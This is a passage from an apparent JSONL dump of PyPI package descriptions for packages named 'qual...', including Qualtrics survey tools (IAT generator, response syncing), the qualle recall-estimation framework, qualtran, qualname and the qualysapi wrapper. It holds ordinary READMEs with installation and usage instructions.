as your interpreter.Adding validatorsValidators are simple functions, usually calledvalidate_XXX()which take no arguments and\nreturn a tuple of anErrorDefinitionand a test function. The test function itself takes\na single argument, thedatastore, which is aMapping(a dict-like) following the structure below.The following is the expected structure for the input data that is given to each validator (thedfsobject).\nYou should assume that not all of these keys are present and handle that appropriately.Any XML uploads are converted into CSV form to give the same inputs.{\n # This years data\n 'Header': # header dataframe\n 'Episodes': # episodes dataframe\n 'Reviews': # reviews dataframe\n 'UASC': # UASC dataframe\n 'OC2': # OC2 dataframe\n 'OC3': # OC3 dataframe\n 'AD1': # AD1 dataframe\n 'PlacedAdoption': # Placed for adoption dataframe\n 'PrevPerm': # Previous permanence dataframe\n 'Missing': # Missing dataframe\n # Last years data\n 'Header_last': # header dataframe\n 'Episodes_last': # episodes dataframe\n 'Reviews_last': # reviews dataframe\n 'UASC_last': # UASC dataframe\n 'OC2_last': # OC2 dataframe\n 'OC3_last': # OC3 dataframe\n 'AD1_last': # AD1 dataframe\n 'PlacedAdoption_last': # Placed for adoption dataframe\n 'PrevPerm_last': # Previous permanence dataframe\n 'Missing_last': # Missing dataframe\n # Metadata\n 'metadata': {\n 'collection_start': # A datetime with the collection start date (year/4/1)\n 'collection_end': # A datetime with the collection end date (year + 1/4/1)\n 'postcodes': # Postcodes dataframe, columns laua, oseast1m, osnrth1m, pcd\n 'localAuthority: # The local authority code entered (long form, e.g. E07000026)\n 'collectionYear': # The raw collection year string - unlikely to need this (e.g. '2019/20')\n }\n}ReleasesTo build and release a new version, make sure all your unit tests pass.We usesemantic versioning, so update the project version inpyproject.tomlaccordingly\nand commit, creating a PR. 
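The expected layout of that dfs mapping is listed just below. Before it, here is a minimal sketch of a validator written in the shape described above, returning an error definition together with a test function and treating a missing table as nothing to report. The ErrorDefinition fields, the error code, the DECOM column name and the rule itself are invented for the example.

```python
from dataclasses import dataclass
from typing import Dict, List

import pandas as pd


@dataclass
class ErrorDefinition:
    # Field names are assumptions for this sketch, not the package's real class.
    code: str
    description: str
    affected_fields: List[str]


def validate_101():
    error = ErrorDefinition(
        code="101",                      # invented code
        description="DECOM is missing",  # invented rule
        affected_fields=["DECOM"],
    )

    def _validate(dfs: Dict[str, pd.DataFrame]) -> Dict[str, List[int]]:
        # The 'Episodes' table (or the column) may be absent; report nothing then.
        if "Episodes" not in dfs or "DECOM" not in dfs["Episodes"].columns:
            return {}
        episodes = dfs["Episodes"]
        return {"Episodes": episodes.index[episodes["DECOM"].isna()].tolist()}

    return error, _validate
```

The full set of keys such a test function can expect is listed next.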
Once the release version is on GitHub, create a GitHub release naming the release with the\ncurrent release name, e.g. 1.0 and the tag with the release name prefixed with a v, i.e. v1.0. Alpha and beta releases\ncan be flagged by appending-alpha.and-beta.."} +{"package": "qualitylib", "pacakge-description": "qualitylibmethods and metrics for the assessment of quality in medical imaging (initial focus on MRI and neuroimaging)Featuresimage quality metricspredictive modelsquality assessment methodsanything else relevantHistory0.0.1 (2021-08-25)First release on PyPI."} +{"package": "quality-master", "pacakge-description": "Quality-MasterQuality-Master is a tool that allows you to check if your commit will degrade the code quality in the master branch."} +{"package": "quality-result-gui", "pacakge-description": "quality-result-guiQGIS plugin for visualizing quality check results.PluginNot implemented yet.LibraryTo use this library as an external dependency in your plugin or other Python code, install it usingpip install quality-result-guiand use imports from the providedquality_result_guipackage. If used in a plugin, library must be installed in the runtime QGIS environment or useqgis-plugin-dev-toolsto bundle your plugin with runtime dependencies included.Minimal working example (with JSON file)For quality dock widget to work, a subclass of QualityResultClient needs to be first implemented. Instance of the created API client class is then passed to QualityErrorsDockWidget. For a real-world application, a separate backend application is needed for checking data quality and provide the quality check results for the QGIS plugin.Example of the expected api response can be seen inthis file.Example parser classfor json response is also provided for the following example to work:importjsonfromqgis.utilsimportifacefromquality_result_gui.api.quality_api_clientimportQualityResultClientfromquality_result_gui.api.types.quality_errorimportQualityErrorfromquality_result_gui_plugin.dev_tools.response_parserimportQualityErrorResponsefromquality_result_gui.quality_error_managerimportQualityResultManagerclassExampleQualityResultClient(QualityResultClient):defget_results(self)->Optional[List[QualityError]]:\"\"\"Retrieve latest quality errors from APIReturns:None: if no results availableList[QualityError]: if results availableRaises:QualityResultClientError: if request failsQualityResultServerError: if check failed in backend\"\"\"full_path_to_json=\"some-path/example_quality_errors.json\"example_response=json.loads(Path(full_path_to_json).read_text())returnQualityErrorResponse(example_response).quality_resultsdefget_crs(self)->QgsCoordinateReferenceSystem:returnQgsCoordinateReferenceSystem(\"EPSG:3067\")api_client=ExampleQualityResultClient()quality_manager=QualityResultManager(api_client,iface.mainWindow())quality_manager.show_dock_widget()Development of quality-result-guiSeedevelopment readme.License & copyrightLicensed under GNU GPL v3.0.This tool is part of the topographic data production system developed in National Land Survey of Finland. 
For further information, see:Abstract for FOSS4GGeneral news article about the projectCopyright (C) 2022National Land Survey of Finland.CHANGELOG2.0.7- 2024-01-17Fix: Process modifications in quality error tree correctly when multiple filters are present2.0.6- 2024-01-05Fix: Show correct results when user processed filter is toggled with map extent filter active2.0.5- 2023-12-12Fix: Filter newly inserted quality error rows correctly with user processed and map extent filters2.0.4- 2023-10-05Fix: Redraw map when an error is selected and errors are not visualized on map2.0.3- 2023-09-12Fix: Include .qm translation files to the zip generated by release workflow action2.0.2- 2023-09-06Fix: Make Finnish translations visible2.0.1- 2023-07-12Feat: Add Finnish translations2.0.0- 2023-07-11Refactor!: replace hierarchical representation of quality errors with a flat quality error list1.1.6- 2023-05-23Feat: Add functionality to display quality error feature type and attribute names from layer aliases.1.1.5- 2023-03-29Fix: Do not zoom to error when geometry is null geometry1.1.4- 2023-03-08Fix: Show correct error count when errors are filteredFix: Remove selected error visualization from map when error is removed from list1.1.3- 2023-03-03Feat: Add method to hide dock widget and functionality to recreate error visualizations1.1.2- 2023-03-01Fix: Do not hide filter menu when a filter is selectedFix: Fix missing marker symbol from line type annotationsFeat: Allow configuring quality layer stylesFeat: Add keyboard shortcut for visualize errors on map1.1.1- 2023-02-23Feat: Change Show user processed filter into checkbox selection1.1.0- 2023-02-16Feat: Add optional extra info field to quality error. Extra info is displayed in the tooltip of error description and may contain html formatted text.Refactor: Remove language specific description fields from quality error and include only a single field for description.1.0.0- 2023-02-14Feat: Added an API to add custom filters for errors.Fix: Hide empty branches from quality error list when user processed errors are hidden and user processes all errors for a featureFix: Error layer stays visible after minimizing QGIS.0.0.4- 2022-12-28Feat: Emit mouse event signal for selected error featureFeat: New filter to filter quality errors by error attribute valueFeat: Add tooltip for quality error descriptionFeat: Update data in tree view partially when data changesFix: Minor styling fixes of tree viewFix: Visualize error when description is clicked0.0.3- 2022-12-15Fix: Use glob paths for missing build resource files0.0.2- 2022-12-14Fix: Fix missing ui and svg files by including them in setuptools build0.0.1- 2022-12-14Initial release: QGIS dock widget for visualizing quality check results"} +{"package": "quality-scaler", "pacakge-description": "No description available on PyPI."} +{"package": "quality-toolkit", "pacakge-description": "Quality-ToolkitToolkit for the quality in order to help writing testsContributionClone the projectgitclonehttps://github.com/veepee-oss/quality-toolkitquality-toolkitcdquality-toolkitInstallation in localmakeinstallInstallation in a projectEdit the project's requirements.txt and add the line :quality-toolkitand finish by install the project dependencies :pip3installHow to use the libSee the list of available componants :HelpersServices"} +{"package": "quality-viewer", "pacakge-description": "quality-viewerA simple CLI for renderingQuality Views. 
Built onGraphviz.Installationpip install quality-viewerUsageTo use, you need to create a series of JSON documents in a folder. These files define the components in your quality view and the individual scores for each attribute. Scores are out of 10,quality-vieweruses the mean to generate the colours in the PDF.This is an example of the component definition:{\n \"component\": \"my-lovely-component\",\n \"depends_on\": [\"my-other-component\"],\n \"attributes\": [\n {\n \"name\": \"code\",\n \"score\": 5,\n \"notes\": \"I wrote this in Uni\"\n },\n {\n \"name\": \"tests\",\n \"score\": 2,\n \"notes\": \"I wrote this in Uni\"\n }\n ]\n}Then you can run the CLI against your folder of component definitions which will generate a PDF in that folder namedquality_view.gv.pdf:quality-viewer ./my_componentsIf you run these regularly, you probably want to label each PDF. Customise the label on the graph with the--labelargument:quality-viewer --label \"Quality Views - Christmas 2019\" ./my_componentsA fairly elaborate example, which uses dated quality views can be found at (other repo)[more work]. This is a good repo to get started from.DevelopmentThis repository is setup to validate your work easily, running tests is as simple as:make testAnd checking your coding style is:make checkTo automagically conform to the above, run:make format"} +{"package": "qualkit", "pacakge-description": "DACT Qualitative Analysis Toolkit (qualkit)This project is a collection of utilities for conducting qualitative\nanalysis.It currently consists of the following modules:clean: a utility for cleaning up text prior to use with other toolssentiment: a wrapper around SciKit's SentimentIntensityAnalyzeranchored_topic_model: creates topic models using the Corex algorithm (Gallagher et. al., 2017) with user-supplied anchors to 'steer' the model using domain knowledgestopwords: a standard set of stopwordstopics: a wrapper around SciKit's LatentDirichletAllocationkeywords: a wrapper around NLTK's RAKE (Rapid Keyword Extraction) algorithm for finding\nkeywords in text.For more details on each module, see the 'docs' folder.Installing the toolkit and its requirementsInstall using:pip install qualkitOr add 'qualkit' to your requirements.txt file, or add as\na dependency in project properties in PyCharm.User ControlA user has control over the following aspects when using this toolkit which will influence outputs.Anchoring strategiesAnchor StrengthNumber of topicsLabelling True/False for each topic instead of dichotomisingHow data is preprocessed before topic modelling, redaction, tfidr vectoriser etecReferencesGallagher, R. J., Reing, K., Kale, D., and Ver Steeg, G. \"Anchored Correlation Explanation: Topic Modeling with Minimal Domain Knowledge.\" Transactions of the Association for Computational Linguistics (TACL), 2017."} +{"package": "qualle", "pacakge-description": "QualleThis is an implementation of the Qualle framework as proposed in the paper\n[1] and accompanying source code.The framework allows to train a model which can be used to predict\nthe quality of the result of applying a multi-label classification (MLC)\nmethod on a document. In this implementation, only therecallis predicted for a document, but in principle\nany document-level quality estimation (such as the prediction of precision)\ncan be implemented analogously.Qualle provides a command-line interface to train\nand evaluate models. 
In addition, a REST webservice for predicting\nthe recall of a MLC result is provided.RequirementsPython>= 3.8is required.InstallationChoose one of these installation methods:With pipQualle is available onPyPI. You can install Qualle using pip:pip install qualleThis will install a command line tool calledqualle. You can callqualle -hto see the help message which will\ndisplay the available modes and options.Note that it is generally recommended to use avirtual environmentto avoid\nconflicting behaviour with the system package manager.From sourceYou also have the option to checkout the repository and install the packages from source. You needpoetryto perform the task:# call inside the project directorypoetryinstall--withoutciDockerYou can also use a Docker Image from theContainer Registry of Github:docker pull ghcr.io/zbw/qualleAlternatively, you can use the Dockerfile included in this project to build a Docker image yourself. E.g.:docker build -t qualle .By default, a container built from this image launches a REST interface listening on0.0.0.0:8000You need to pass the model file (see below the section REST interface) per bind mount or volume to the docker container.\nBeyond that, you need to specify the location of the model file with an\nenvironment variable namedMODEL_FILE:docker run --rm -it --env MODEL_FILE=/model -v /path/to/model:/model -p 8000:8000 ghcr.io/zbw/qualleGunicornis used as HTTP Server. You can use the environment variableGUNICORN_CMD_ARGSto customize\nGunicorn settings, such as the number of worker processes to use:docker run --rm -it --env MODEL_FILE=/model --env GUNICORN_CMD_ARGS=\"--workers 4\" -v /path/to/model:/model -p 8000:8000 ghcr.io/zbw/qualleYou can also use the Docker image to train or evaluate by using the Qualle command line tool:dockerrun--rm-it-v\\/path/to/train_data_file:/train_data_file/path/to/model:/modelghcr.io/zbw/qualle\\qualletrain/train_data_file/modelThe Qualle command line tool is not available for the release 0.1.0 and 0.1.1. For these releases,\nyou need to call the python modulequalle.maininstead:dockerrun--rm-it-v\\/path/to/train_data_file:/train_data_file/path/to/model:/modelghcr.io/zbw/qualle:0.1.1\\python-mqualle.maintrain/train_data_file/modelUsageInput dataIn order to train a model, evaluate a model or predict the quality of an MLC result\nyou have to provide data.This can be a tabular-separated file (tsv) in the format (tabular is marked with\\t)document-content\\tpredicted_labels_with_scores\\ttrue_labelswheredocument-contentis a string describing the content of the document\n(more precisely: the string on which the MLC method is trained), e.g. 
the titlepredicted_labels_with_scoresis a comma-separated list of pairspredicted_label:confidence-score(this is basically the output of the MLC method)true_labelsis a comma-separated list of true labels (ground truth)Note that you can omit thetrue_labelssection if you only want to predict the\nquality of the MLC result.For example, a row in the data file could look like this:Optimal investment policy of the regulated firm\\tConcept0:0.5,Concept1:1\\tConcept0,Concept3For those who use an MLC method via the toolkitAnniffor automated subject indexing:\nYou can alternatively specify afull-text document corpuscombined with the result of the Annif index method (tested with Annif version 0.59) applied on the corpus.\nThis is a folder with three files per document:doc.annif: result of Annif index methoddoc.tsv: ground truthdoc.txt: document contentAs above, you may omit thedoc.tsvif you just want to\npredict the quality of the MLC result.TrainTo train a model, use thetrainmode, e.g.:qualle train /path/to/train_data_file /path/to/output/modelIt is also possible to use label calibration (comparison of predicted vs actual labels) using the subthesauri of a thesaurus (such as theSTW)\nas categories (please read the paper for more explanations). Consult the help (see above) for the required options.EvaluateYou must provide test data and the path to a trained model in order to evaluate that model. Metrics\nsuch as theexplained variationare printed out, describing the quality\nof the recall prediction (please consult the paper for more information).REST interfaceTo perform the prediction on a MLC result, a REST interface can be started.uvicornis used as HTTP server. You can also use any\nASGI server implementation and create the ASGI app directly with the methodqualle.interface.rest.create_app. You need to provide the environment variable\nMODEL_FILE with the path to the model (seequalle.interface.config.RESTSettings).The REST endpoint expects a HTTP POST with the result of a MLC for a list of documents\nas body. The format is JSON as specified inqualle/openapi.json. You can also use\nthe Swagger UI accessible athttp://address_of_server/docsto play around a bit.ContributeContributions via pull requests are welcome. Please create an issue beforehand\nto explain and discuss the reasons for the respective contribution.qualle code should follow theBlack style.\nThe Black tool is included as a development dependency; you can runblack .in the project root to autoformat code.References[1]Toepfer, Martin, and Christin Seifert. \"Content-based quality estimation for automatic subject indexing of short texts under precision and recall constraints.\" International Conference on Theory and Practice of Digital Libraries. Springer, Cham, 2018., DOI 10.1007/978-3-030-00066-0_1Context informationThis code was created as part of the subject indexing automatization effort atZBW - Leibniz Information Centre for Economics. Seeour homepagefor more information, publications, and contact details."} +{"package": "qualm", "pacakge-description": "QualmQualm is an esolang, which uses a cell-based memory model.InstallationYou can install Qualm from PyPi:python3 -m pip install --user qualmOr clone the repository:$ git clone https://github.com/wilfreddv/qualm.git\n$ cd qualm\n$ python3 -m pip install --user .DocumentationData operations:\n| split string on delimiter\n@ index of, e.g.: \"'apples pears bananas:@'apples\n$ indexing\ni turn into integer\nc turn into character (chr())\no turn into ascii value (ord())\n\n. 
read from STDIN\n! write to STDOUT\nw working cell\ns swap var with w\n> push w to \n< pop to w\n> write output of previous operation to \n can also be `w`, like sw\nv put data in w\n'...: string data\n{{...} loop\n+ add\n- sub\n* mul\n/ div\n% mod\n= equals\n!= neq\n<= smaller\n>= biggerExamplesHello worldHello world:\nv'Hello World!:!\n\nv write into working cell\n' denotes string data\n! printsFibonacci sequencev2>0v1>1{s1<=23416728348467685{!iv' :!<1+<0s0}"} +{"package": "qualname", "pacakge-description": "Python module to emulate the__qualname__attribute for classes and methods\n(Python 3.3+) in older Python versions. SeePEP 3155for details.Installationpip install qualnameUsageAssume these definitions:class C:\n def f():\n pass\n\n class D:\n def g():\n passIn Python 3.3+, classes have a__qualname__property:>>> C.__qualname__\n'C'\n>>> C.f.__qualname__\n'C.f'\n>>> C.D.__qualname__\n'C.D'\n>>> C.D.g.__qualname__\n'C.D.g'Unfortunately, Python 2 and early Python 3 versions do not have an (obvious)\nequivalent.qualnameto the rescue:from qualname import qualname\n\n>>> qualname(C)\n'C'\n>>> qualname(C.f)\n'C.f'\n>>> qualname(C.D)\n'C.D'\n>>> qualname(C.D.g)\n'C.D.g'Victory!How does it work?Glad you ask.This module uses source code inspection to figure out how (nested) classes and\nfunctions are defined in order to determine the qualified names for them. That\nmeans parsing the source file, and traversing the AST (abstract syntax tree).\nThis sounds very hacky, and it is, but the Python interpreter itself does not\nhave the necessary information, so this justifies extreme measures.Now that you know how it works, you\u2019ll also understand that this module only\nworks when the source file is available. Fortunately this is the case in most\ncircumstances.LicenseBSD.Feedback? Issues?https://github.com/wbolster/qualname"} +{"package": "qualpay", "pacakge-description": "UNKNOWN"} +{"package": "qualpy", "pacakge-description": "UNKNOWN"} +{"package": "qualtop-conversational-analysis", "pacakge-description": "Conversational analysis based on communication with the OpenAI API (regardless of the API Base)Implementation of several methods for communication with the OpenAI API, embedding-based retrieval and data preparationGetting StartedCan be installed directly with pip (asetup.pyfile is provided, if needed).Notably the module contains theChatGPTMemoryclass, which enables communication with the OpenAI API (through the ChatCompletion endpoint) while managing conversation memory.Data preparation modulesThis project was not originally intended for production. A lot of the scripts contained here are mainly for data preparation (to demonstrate different use cases). However, some functions are being used by both thequaltop-llmapiand the QOPA-LLMdemosides of the project.In the future, this module should be replaced by a communication module. Also, any existent calculation functions should be passed to the server."} +{"package": "qualtop-llmapi", "pacakge-description": "Implementation of the OpenAI API for local LLM useImplementation of the OpenAI API. 
Currently supports two end points (ChatCompletion and Embeddings) with the following models:ChatCompletion models:'mistral-7b': 7B Instruct model trained by MistralAI.'llama-13b': 13B Llama 2 model trained by Meta.'llama-7b': 7B Instruct Llama 2 model trained by Together AI (32K context).'codellama-13b': 13B CodeLlama model trained by Meta.Embeddings models:'mistral-7b' : Encodes documents into 4096-dimension vectors.'bert' : Encodes documents into 386-dimension vectors.Getting StartedCan be installed directly with pip (asetup.pyfile is provided, if needed).Once installed, the FastAPI server (Uvicorn) can be started with:run_serverPromptsCurrently, two kinds of prompts are supported.Open ended questions to engage in conversation with the model.Instruct prompts for vector-based retrieval over some test collections.Some considerationsThis project is by no means production ready. The ChatCompletion endpoint in particular has been tailored to communicate with the QOPA-LLMdemo. A lot of work is needed security-wise to avoid data leaking."} +{"package": "qualtran", "pacakge-description": "# Q\u1d1c\u1d00\u029f\u1d1b\u0280\u1d00\u0274Q\u1d1c\u1d00\u029f\u1d1b\u0280\u1d00\u0274 (quantum algorithms translator) is a set of abstractions for representing quantum\nprograms and a library of quantum algorithms expressed in that language to support quantum\nalgorithms research.Note:Qualtran is an experimental preview release. We provide no backwards compatibility\nguarantees. Some algorithms or library functionality may be incomplete or contain inaccuracies.\nOpen issues or contact the authors with bug reports or feedback.Subscribe to [qualtran-announce@googlegroups.com](https://groups.google.com/g/qualtran-announce)\nto receive the latest news and updates!## DocumentationDocumentation is available athttps://qualtran.readthedocs.io/## InstallationQualtran is being actively developed. We recommend installing from source:git clonehttps://github.com/quantumlib/Qualtran.gitcd Qualtran/\npip install -e .You can also install the latest tagged release usingpip:pip install qualtran"} +{"package": "qualtrics-api", "pacakge-description": "qualtrics_apiA Python-based project that performs a query to a Qualtrics API.InstallationIn order to install this package, you can use the following command:pipinstallqualtrics-apiUsageOn terminal you can use it in the following way:qualtrics-api-t-d-sThis will return the survey with all the responses on JSON format.Powered by: Hugo Angulo"} +{"package": "qualtrics-iat", "pacakge-description": "Qualtrics IAT ToolA web app for generating the Implicit Association Test (IAT) running on QualtricsOnline Web AppThe app is hosted byStreamlit, a Python-based web framework. You can use the app here:Qualtrics IAT Tool.Run Web App OfflineAlternatively, you can run the app offline. The general steps are:Download the latest version of the repository.Install Python and Streamlit.Run the web app in a Terminal with the command:streamlit run your_directory/qualtrics_iat/web_app.pyCitation:Cui Y., Robinson, J.D., Kim, S.K., Kypriotakis G., Green C.E., Shete S.S., & Cinciripini P.M., An open source web\napp for creating and scoring Qualtrics-based implicit association test. arXiv:2111.02267 [q-bio.QM]Key FunctionalitiesThe web app has three key functionalities: IAT Generator, Qualtrics Tools, and IAT Data Scorer. Each functionality\nis clearly described on the web app regarding what parameters are expected and what they mean. 
If you have any\nquestions, please feel free to leave a comment or send your inquiries to me.IAT GeneratorIn this section, you can generate the Qualtrics survey template to run the IAT experiment. Typically, you\nneed to consider specifying the following parameters. We'll use the classic flower-insect IAT as an example. As\na side note, there are a few other IAT tasks (e.g., gender-career) in the app for your reference.Positive Target Concept: FlowerNegative Target Concept: InsectPositive Target Stimuli: Orchid, Tulip, Rose, Daffodil, Daisy, Lilac, LilyNegative Target Stimuli: Wasp, Flea, Roach, Centipede, Moth, Bedbug, GnatPositive Attribute Concept: PleasantNegative Attribute Concept: UnpleasantPositive Attribute Stimuli: Joy, Happy, Laughter, Love, Friend, Pleasure, Peace, WonderfulNegative Attribute Stimuli: Evil, Agony, Awful, Nasty, Terrible, Horrible, Failure, WarOnce you specify these parameters, you can generate a Qualtrics template file, from which you can create a Qualtrics\nsurvey that is ready to be administered. Please note that not all Qualtrics account types support creating surveys\nfrom a template. Alternatively, you can obtain the JavaScript code of running the IAT experiment and add the code\nto a Qualtrics question. If you do this, please make sure that you set the proper embedded data fields.Qualtrics ToolsIn this section, you can directly interact with the Qualtrics server by invoking its APIs. To use these APIs, you\nneed to obtain the token in your account settings. Key functionalities include:Upload Images to Qualtrics Graphic Library:\nYou can upload images from your local computer to your Qualtrics Graphics Library. You need to specify the library\nID # and the name of the folder to which the images will be uploaded. If the upload succeeds, the web app will return\nthe URLs for these images. You can set these URLs as stimuli in the IAT if your experiment uses pictures.Create Surveys:\nYou can create surveys by uploading a QSF file or the JSON text. Please note that the QSF file uses JSON as its\ncontent. If you're not sure about the JSON content, you can inspect a template file.Export Survey Responses:\nYou can export a survey's responses for offline processing. You need to specify the library ID # and the export file\nformat (e.g., csv).Delete Images:\nYou can delete images from your Qualtrics Graphics Library. You need to specify the library ID # and the IDs for\nthe images that you want to delete.Delete Survey:\nYou can delete surveys from your Qualtrics Library. You need to specify the survey ID #.IAT Data ScorerIn this section, you can score the IAT data from the exported survey response. Currently, there are two calculation\nalgorithms supported: the conventional and the improved.Citation for the algorithms: Greenwald et al. Understanding and Using the Implicit Association Test: I. An\nImproved Scoring Algorithm. 
Journal of Personality and Social Psychology 2003 (85)2:192-216The Conventional AlgorithmUse data from B4 & B7 (counter-balanced order will be taken care of in the calculation).Nonsystematic elimination of subjects for excessively slow responding and/or high error rates.Drop the first two trials of each block.Recode latencies outside 300/3,000 boundaries to the nearer boundary value.5.Log-transform the resulting values.Average the resulting values for each of the two blocks.Compute the difference: B7 - B4.The Improved AlgorithmUse data from B3, B4, B6, & B7 (counter-balanced order will be taken care of in the calculation).Eliminate trials with latencies > 10,000 ms; Eliminate subjects for whom more than 10% of trials have latency\nless than 300 ms.Use all trials; Delete trials with latencies below 400 ms (alternative).Compute mean of correct latencies for each block. Compute SD of correct latencies for each block (alternative).Compute one pooled SD for all trials in B3 & B6, another for B4 & B7; Compute one pooled SD for correct trials\nin B3 & B6, another for B4 & B7 (alternative).Replace each error latency with block mean (computed in Step 5) + 600 ms; Replace each error latency with\nblock mean + 2 x block SD of correct responses (alternative 1); Use latencies to correct responses when correction to\nerror responses is required (alternative 2).Average the resulting values for each of the four blocks.Compute two differences: B6 - B3 and B7 - B4.Divide each difference by its associated pooled-trials SD.Average the two quotients.Questions?If you have any questions or would like to contribute to this project, please send me an email:ycui1@mdanderson.org.LicenseMIT License"} +{"package": "qualtrics-mailer", "pacakge-description": "No description available on PyPI."} +{"package": "qualtrics-utils", "pacakge-description": "qualtrics-utilsUtilities for qualtrics surveys. Get and sync survey responses, generate codebooks, & c.Quickstart \ud83d\ude80This project requires Python^3.10to run.viapoetryInstall poetry, then runpoetry installAnd you're done.surveysExportingExample (get a survey's responses, convert to a pandas DataFrame):fromqualtrics_utilsimportSurveyssurveys=Surveys(api_token=QUALTRICS_API_TOKEN)exported_file=surveys.get_responses_df(survey_id=SURVEY_ID)df=exported_file.dataSurvey's can be exported to a variety of formats, including:.csv.xlsx.jsonAnd with a variety of parameters. Please see theExportCreationRequestdocumentationhereinsyncPerhaps one of the more useful features hereof is the ability to sync survey responses to the following services:Google SheetsMySQLFuture services will include:PostgreSQLMongoDBAWS S3Syncing can either be leveraged as a standard python module, or as a CLI tool.CLIExecute thehelpcommand to see the available options:python-mqualtrics_utils.sync--helpSee also theconfig.example.tomlfor an example configuration file.ModuleSimply importsync_*from thequaltrics_utils.syncmodule, and execute the function with the appropriate arguments.Syncing informationThe process is fairly straightforward:Ensure that the service has two \"tables\", or datastores for:Survey responses: This defaults to the input base name (defaults to the survey ID) +_responsesSurvey export statuses: This defaults to the input base name (defaults to the survey ID) +_statusExport the survey responses to the serviceUpdate the survey export statuses to reflect the exportThis will allow for a sync to pick up where it left off, only exporting newly found responses. 
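As a rough sketch of that bookkeeping, the snippet below appends only unseen responses and records the export in the status table; the column names and the function itself are hypothetical rather than part of qualtrics_utils.

```python
import pandas as pd


def incremental_sync(new_responses: pd.DataFrame,
                     responses_table: pd.DataFrame,
                     status_table: pd.DataFrame,
                     export_id: str):
    """Append only unseen responses and record the export in the status table.

    Using 'ResponseId' as the de-duplication key is an assumption of this sketch.
    """
    seen = set(responses_table["ResponseId"])
    fresh = new_responses[~new_responses["ResponseId"].isin(seen)]

    updated_responses = pd.concat([responses_table, fresh], ignore_index=True)
    status_row = pd.DataFrame([{
        "export_id": export_id,
        "rows_added": len(fresh),
        "synced_at": pd.Timestamp.now(tz="UTC"),
    }])
    updated_status = pd.concat([status_table, status_row], ignore_index=True)
    return updated_responses, updated_status
```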
Please note, if a first time sync contains enough survey responses to exceed the service's limits (~1.8 GB), the sync will fail. Please see theQualtrics documentationfor more information.For example, in google sheets:fromqualtrics_utilsimportSurveys,sync_sheetsimportpandasaspd# Survey ID or URLsurvey_id=...# Sheet URLresponses_url=...# dict of extra survey arguments for the export creation requestsurvey_args=...sheets=Sheets()defpost_processing_func(df:pd.DataFrame)->pd.DataFrame:# Do some post processing of the responses before syncing herereturndfsync_sheets(survey_id=survey_id,surveys=surveys,response_post_processing_func=post_processing_func,sheet_name=table_name,sheet_url=responses_url,sheets=sheets,**survey_args,)Codebook mappinggenerate.pyTakes the exported.qsffile from Qualtrics and generates a codebook mapping question\nIDs to question text and answer choices. The output is a JSON file containing a list of\ndictionaries.Example row:{\"question_number\":\"Q5.10\",\"question_string\":\"What is your role at this school?\",\"answer_choices\":\"...\"},map_columns.pyTakes a codebook mapping (generated by the above function) and creates conditional\nstatements to map the question columns into valid Tableau or SQL code. Used to create a\nsingular question column in the above formats when there are multiple questions in a\nsingle question block (e.g. multiple Likert scale questions).OpenAPI clientTo handle the majority of the qualtrics API calls, we use the publicly available OpenAPI spec, found on the qualtrics API docswebsiteThe OpenAPI spec is fed toopenapi-python-client, where it's used to generate a python client(s) for the qualtrics API. These clients (for each of the utilized APIs) come bundled and pre-generated as-is, but to create them anew, one can execute thecreate_api_client.pyscript. This will re-generate the clients and place them in thequaltrics_utilsdirectory. Occasionally, the OpenAPI spec is broken and mis-validated from Qualtrics; regenerate at your own risk."} +{"package": "qualtrutils", "pacakge-description": "QualtrUtils - A package to create questions from templates with Qualtrics (v3) APIThis package allows the creation of questions based on an existing template (i.e., a question created with the Qualtrics interface. The operations that this package supports are:Creating blockCopying an existing questionReplacing keywordsChanging multiple choice answersChanging the initial position of the sliderChanging a question JS codeInstallationUsing PIP:pipinstallqualtrutilsUsing CONDA:condainstall-cemanuele-albiniqualtrutilsFor developersTo use the package in editable mode use instead the following.gitclonehttps://github.com/emanuele-albini/qualtrutils.git\npipinstall--editablequaltrutilsConfiguration (optional)Global configuration is in~\\.qualtrutils\\qualtrics.toml. 
Example:API_URL=\"https://yourdatacenter.qualtrics.com/API/v3/\"API_TOKEN=\"your_token\"LIBRARY_ID=\"UR_XXXXXXXXXXXXX\"SURVEY_ID=\"SV_XXXXXXXXXXXXX\"The configuration saved in~\\.qualtrutils\\qualtrics.tomlwill be used as default inQualtricsSurveyconstructor.This configuration it's optional, the settigs can be directly passed toQualtricsSurveyat runtime.Usage examplefromqualtrutilsimportQualtricsSurveysurvey=QualtricsSurvey()# Get a question from an existing surveyquestion=survey.get_question_by_name('QuestionName','MyNewQuestion')# The following will replace (using regex) all the occurences# of 'SOMETHING' in the question text and multiples choice answers (if any)# with 'SOMETHING_ELSE'question.text_sub('SOMETHING','SOMETHING_ELSE')# The following will set the multiple choice answersquestion.set_choices(['First Answer','Second Answer','Third Answer'])# The flowwing will set the Javascript code of the questionquestion.set_js('var hello = 1;')# Add this new question to the survey in a block called 'Block A'# If the block does not exists it will be createdsurvey.create_question(question,'Block A')DocumentationSeeherefor the complete documentation with all the functionalities."} +{"package": "qualysapi", "pacakge-description": "qualysapiPython package, qualysapi, that makes calling any Qualys API very simple. Qualys API versions v1, v2, & WAS & AM (asset management) are all supported.My focus was making the API super easy to use. The only parameters the user needs to provide is the call, and data (optional). It automates the following:Automatically identifies API version through the call requested.Automatically identifies url from the above step.Automatically identifies http method as POST or GET for the request per Qualys documentation.UsageCheck out the example scripts in the/examples directory.ConnectThere are currenty three methods of connecting to Qualys APIsqualysapi.connect()will prompt the user for credentials at runtime.qualysapi.connect('/path/to/config.ini')will parse the config file for credentials (see below).qualysapi.connect(username='username', password='password')will use the provided credentials.ExampleDetailed example found atqualysapi-example.py.Sample example below.>>>importqualysapi>>>a=qualysapi.connect()QualysGuardUsername:my_usernameQualysGuardPassword:>>>printa.request('about.php')7.10.61-17.1.10-12.2.475-2InstallationUse pip to install:pipinstallqualysapiNOTE: If you would like to experiment without installing globally, look into 'virtualenv'.Requirementsrequests (http://docs.python-requests.org)lxml (http://lxml.de/)ConfigurationBy default, the package will ask at the command prompt for username and password. By default, the package connects to the Qualys documented host (qualysapi.qualys.com).You can override these settings and prevent yourself from typing credentials by doing any of the following:By running the following Python,qualysapi.connect(remember_me=True). This automatically generates a .qcrc file in your current working directory, scoping the configuration to that directory.By running the following Python,qualysapi.connect(remember_me_always=True). This automatically generates a .qcrc file in your home directory, scoping the configuratoin to all calls to qualysapi, regardless of the directory.By creating a file called '.qcrc' (for Windows, the default filename is 'config.ini') in your home directory or directory of the Python script.This supports multiple configuration files. 
